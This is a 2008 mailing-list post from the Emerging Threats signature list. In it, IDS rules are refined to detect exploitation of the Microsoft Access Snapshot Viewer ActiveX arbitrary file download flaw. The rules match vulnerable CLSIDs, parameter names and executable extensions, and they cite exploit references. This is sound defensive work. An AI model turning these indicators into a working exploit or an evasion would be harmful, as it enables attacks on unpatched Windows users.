[Emerging-Sigs] Sig for MS Office Snapshot

Matt Jonkman jonkman at jonkmans.com
Mon Jul 14 11:23:49 EDT 2008 

Got some more info privately about the vulnerability. How we're doing it 
is the best can be done for now. But I'll split this to 3 sigs like so:

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( msg:"ET 
CURRENT_EVENTS Snapshot Viewer for Microsoft Access ActiveX Control 
Arbitrary File Download (1)"; flow:to_client,established; 
content:"clsid"; nocase; content:"F0E42D50-368C-11D0-AD81-00A0C90DC8D9"; 
nocase; pcre:"/(SnapshotPath|CompressedPath|PrintSnapshot)/i"; 
pcre:"/(exe|bat|com|dll|ini)/i"; reference:bugtraq,30114; 
reference:url,downloads.securityfocus.com/vulnerabilities/exploits/30114.html;reference:url,pstgroup.blogspot.com/2008/07/exploitmicrosoft-office-snapshot-viewer.html; 
classtype:web-application-attack; sid:2008407; rev:1;)

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( msg:"ET 
CURRENT_EVENTS Snapshot Viewer for Microsoft Access ActiveX Control 
Arbitrary File Download (2)"; flow:to_client,established; 
content:"clsid"; nocase; content:"F0E42D60-368C-11D0-AD81-00A0C90DC8D9"; 
nocase; pcre:"/(SnapshotPath|CompressedPath|PrintSnapshot)/i"; 
pcre:"/(exe|bat|com|dll|ini)/i"; reference:bugtraq,30114; 
reference:url,downloads.securityfocus.com/vulnerabilities/exploits/30114.html;reference:url,pstgroup.blogspot.com/2008/07/exploitmicrosoft-office-snapshot-viewer.html; 
classtype:web-application-attack; sid:2008408; rev:1;)

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( msg:"ET 
CURRENT_EVENTS Snapshot Viewer for Microsoft Access ActiveX Control 
Arbitrary File Download (3)"; flow:to_client,established; 
content:"clsid"; nocase; content:"F2175210-368C-11D0-AD81-00A0C90DC8D9"; 
nocase; pcre:"/(SnapshotPath|CompressedPath|PrintSnapshot)/i"; 
pcre:"/(exe|bat|com|dll|ini)/i"; reference:bugtraq,30114; 
reference:url,downloads.securityfocus.com/vulnerabilities/exploits/30114.html;reference:url,pstgroup.blogspot.com/2008/07/exploitmicrosoft-office-snapshot-viewer.html; 
classtype:web-application-attack; sid:2008409; rev:1;)

Look good to everyone? Thanks Chandan!!

Matt

chandan wrote:
> Signature for  Microsoft Office Snapshot Viewer ActiveX control.
> 
> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( msg:"Snapshot 
> Viewer for Microsoft Access ActiveX Control Arbitrary File Download"; 
> flow:to_client,established; content:"clsid"; nocase; 
> pcre:"/(F0E42D50-368C-11D0-AD81-00A0C90DC8D9|F0E42D60-368C-11D0-AD81-00A0C90DC8D9|F2175210-368C-11D0-AD81-00A0C90DC8D9)/i"; 
> pcre:"/(SnapshotPath|CompressedPath|PrintSnapshot)/i"; 
> pcre:"/(exe|bat|com|dll|ini)/i"; reference:bugtraq,30114; 
> reference:url,downloads.securityfocus.com/vulnerabilities/exploits/30114.html; 
> reference:url,pstgroup.blogspot.com/2008/07/exploitmicrosoft-office-snapshot-viewer.html; 
> classtype:web-application-attack; sid:9003; rev:1;)
> 
> Regards,
> Chandan
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

More information about the Emerging-sigs mailing list